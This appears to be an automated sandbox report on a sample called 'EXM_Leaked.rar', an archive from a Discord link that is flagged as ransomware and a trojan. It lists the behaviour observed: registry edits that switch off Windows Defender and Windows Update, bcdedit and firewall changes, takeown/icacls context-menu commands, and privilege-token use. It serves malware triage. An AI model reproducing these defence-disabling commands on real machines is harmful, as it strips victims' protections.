Malware Analysis Report

2025-08-05 20:44

Sample ID 240302-21wdzsab71
Target https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&
Tags
evasion persistence ransomware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1& was found to be: Known bad.

Malicious Activity Summary

evasion persistence ransomware trojan upx

Modifies Windows Defender Real-time Protection settings

Modifies visibility of file extensions in Explorer

Modifies security service

Modifies boot configuration data using bcdedit

Stops running service(s)

Modifies Windows Firewall

Modifies system executable filetype association

Executes dropped EXE

UPX packed file

Loads dropped DLL

Adds Run key to start application

Launches sc.exe

Enumerates processes with tasklist

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Enumerates system info in registry

Runs net.exe

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Gathers network information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-02 23:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-02 23:03

Reported

2024-03-02 23:08

Platform

win10v2004-20240226-en

Max time kernel

273s

Max time network

280s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" C:\Windows\system32\reg.exe N/A

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" C:\Windows\system32\reg.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A (64 identical rows)

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe N/A (18 identical rows)

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (43 identical rows)

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A (3 identical rows)

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A (2 identical rows)

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A (4 identical rows)

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\OptimizeWindowsSearchResultsForScreenReaders = "0" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes\ShowSearchSuggestionsGlobal = "0" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DoNotTrack = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\EnableEncryptedMediaExtensions = "0" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{2D8D44F7-5EB9-4D44-9815-5FF6266782D3} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "0" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (9 identical rows)
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A (2 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (4 identical rows)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (9 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A (2 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3704 wrote to memory of 4928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 4648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3704 wrote to memory of 1088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5700 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5744 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4544 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6128 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

